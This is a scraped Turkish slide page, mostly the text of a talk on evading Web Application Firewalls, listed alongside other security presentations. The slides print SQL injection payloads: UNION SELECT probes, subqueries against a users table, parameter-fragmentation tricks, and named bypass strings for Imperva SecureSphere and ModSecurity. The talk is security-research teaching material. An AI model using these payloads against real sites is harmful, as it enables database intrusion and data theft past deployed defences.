İstanbul Şehir Üniversitesi - Windows 7 Ortamında Zararlı Yazılım Analizi - Bilgi Güvenliği Mühendisliği Yüksek Lisans Programı - Bilgisayar Adli Analizi Dersi
Hazırlayan: Hasan Ekşi
İstanbul Şehir Üniversitesi - Windows 7 Ortamında Zararlı Yazılım Analizi - Bilgi Güvenliği Mühendisliği Yüksek Lisans Programı - Bilgisayar Adli Analizi Dersi
Hazırlayan: Hasan Ekşi
Kısıtlar İçerecek Şekilde Revize Edilmiş Atama Algoritmasına Ait Bir Uygulama...Can K.
Bu çalışmada, istenilen kısıtlar altında uygun grupların ve bununla birlikte ilgili eşleştirmelerin oluşturulmasına olanak sağlayan “Kısıtlar İçerecek Şekilde Revize Edilmiş Atama Algoritması” önerilmiş ve bilgisayar ortamında (Python programlama dilinde) uygulaması gerçeklenmiştir. Uygulama sonuçlarına göre, standart atama algoritmasının uygun çözüm vermediği durumlarda verimli bir şekilde (makul sürede sonuç veren) uygun çözüme ulaşılmaktadır. Algoritmanın çeşitli eşleştirme problemlerine verimli bir şekilde çözüm verecek hale getirilmesinin seçim aşamasında belirtilen kısıtların ağırlıklandırılması değiştirilerek elde edilebileceği gösterilmiştir. Bu uygulamanın kullanılabilirliğini göstermek amacıyla, Ondokuz Mayıs Üniversitesi Bilgisayar Mühendisliği Bölümü bitirme projeleri seçiminde/dağıtımında kullanılacak şekilde özelleştirilme yapılmış ve proje gruplarının oluşturulması konusunda çeşitli değerlendirmeler yapılmıştır.
Bu sunumda Web Uygulama Güvenlik Duvarları'nı (WAF) atlatma tekniklerinden bahsedilmiştir..
In this presentation, evasion and bypass techniques of Web Application Firewalls (WAF) are discussed.
CRYPTTECH NG Siber Güvenlik ürünlerindeki, yeni geliştirilen özellikler, ürün ön yüz ve teknolojilerinde yapılan inovasyonlar konulu sunum.
Tarık KOBALAS
Teknoloji Direktörü
CRYPTTECH NG Siber Güvenlik ürünlerimizdeki, yeni geliştirilen özellikler, ürün ara yüzlerindeki değişimler konulu sunum.
Tarık Kobalas
CRYPTTECH Teknoloji Direktörü
Unutmayın! Siber saldırılarda her türde ve büyüklükteki işletme risk altındadır ve en zayıf halka insan faktörüdür! Hem teorik hem pratik örneklerle oluşan içeriğiyle bu eğitim, son savunma hattınız olan çalışanlarınızın güncel siber tehditleri daha iyi anlayıp gerekli önlemleri almasını sağlamada çok faydalı olacaktır.
BGA Security tarafından her yıl yaklasık olarak 200’e yakın
sızma testi projesi gerçeklestirilmektedir. Bu projeler standart
olmayıp müsterilerin taleplerine göre farklı boyutlarda
olabilmektedir. Bu rapor yapılan çalışmalarda karşılaşılan zafiyetler ve istismar yöntemlerinin istatistiklerini paylaşmak amacıyla hazırlanmıştır.
Fidye yazılımı, kurbanın dosyalarını şifreleyen kötü amaçlı bir yazılım türüdür. Saldırgan, ödeme yapıldıktan sonra
verilerine tekrar erişebilmesi için kurbandan fidye talep eder.
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing RaporuBGA Cyber Security
Bu raporda 2020 yılının ilk yarısı için Türkiye'de bulunan bankalar adına açılan sahte alan adları
(domain), bu alan adlarının SSL sertifikası durumları ve kayıt bilgilerine yönelik analizler yer almakta
olup, aylara göre artışları ve saldırganların motivasyonları incelenmiştir.
Aktif Dizin (Active Directory) Güvenlik Testleri - I: Bilgi ToplamaBGA Cyber Security
Ağ haritalama (Enumeration), sızma testi metodolojilerinden biridir. Hedef ile aktif bir bağ oluşturulduğunda ve hedefe saldırıda bulunurken giriş noktasını tespit etmek amacıyla sistemin ağ yapısının detaylı belirlenmesidir:
Açık sistemler ve üzerindeki açık portlar, servisler ve servislerin hangi yazılımın hangi sürümü olduğu bilgileri, ağ girişlerinde bulunan VPN, Firewall, IPS cihazlarının belirlenmesi, sunucu sistemler çalışan işletim sistemlerinin ve versiyonlarının belirlenmesi ve tüm bu bileşenler belirlendikten sonra hedef sisteme ait ağ haritasının çıkartılması Ağ haritalama adımlarında yapılmaktadır.
5. Temelleri Anlamak
❖ Web uygulamalarının karmaşık yapısı
❖ Çok katmanlı mimari (istemciler, web s., web
servisleri, veritabanı s.)
❖ Birçok teknolojinin beraber veya birbirinin
yerine
kullanılması(php,asp,jsp,servlet,scala,c++,
[js],html,css,mssql,mysql,oracle,postgresql,n
osql, …..)
10. i’siz SQLi
❖ %100’ü SQL olan SQLi
–
–
?id=1 union all select null
?id=1 union(select null)
11. i’siz SQLi
❖ %100’ü SQL olan SQLi
–
–
–
?id=1 union all select null
?id=1 union(select null)
?id=1 and (select id from users limit 0,1)>10
12. i’siz SQLi
❖ %100’ü SQL olan SQLi
–
–
–
–
?id=1 union all select null
?id=1 union(select null)
?id=1 and (select id from users limit 0,1)>10
?id=1 and (select id from users where
pass=0x1F2B…) > 10
13. i’siz SQLi
❖ %100’ü SQL olan SQLi
–
–
–
–
?id=1 union all select null
?id=1 union(select null)
?id=1 and (select id from users limit 0,1)>10
?id=1 and (select id from users where
pass=0x1F2B…) > 10
18. Encoding
❖ Tanınmayan encoding
❖ Birden fazla decode işlemi
–
–
hem uygulama hem veritabanı decode edebilir
decode işlemi yapan birden fazla fonksiyon
kullanımış olabilir
❖ Performans kaygısı
–
Sorgusuz decode mu?
29. HPF
❖ ?p1=-1 union select 1--&p2=100
❖ select * from table where p1={p1} and
p2={p2}
30. HPF
❖ ?p1=-1 union select 1--&p2=100
❖ select * from table where p1={p1} and
p2={p2}
❖ ?p1=-1 union/*&p2=*/ select 1,2,3
31. HPF
❖ ?p1=-1 union select 1--&p2=100
❖ select * from table where p1={p1} and
p2={p2}
❖ ?p1=-1 union/*&p2=*/ select 1,2,3
❖ select * from table where p1=-1 union/* and
*/ select 1,2,3
32. Bilinen Örnekler
❖ Imperva SecureSphere
–
15 and '1'=(SELECT '1' FROM dual) and
'0having'='0having'
❖ Modsecurity MySQL Version
– 15 /*!1union select null*/
❖ Modsecurity IIS
–
HPP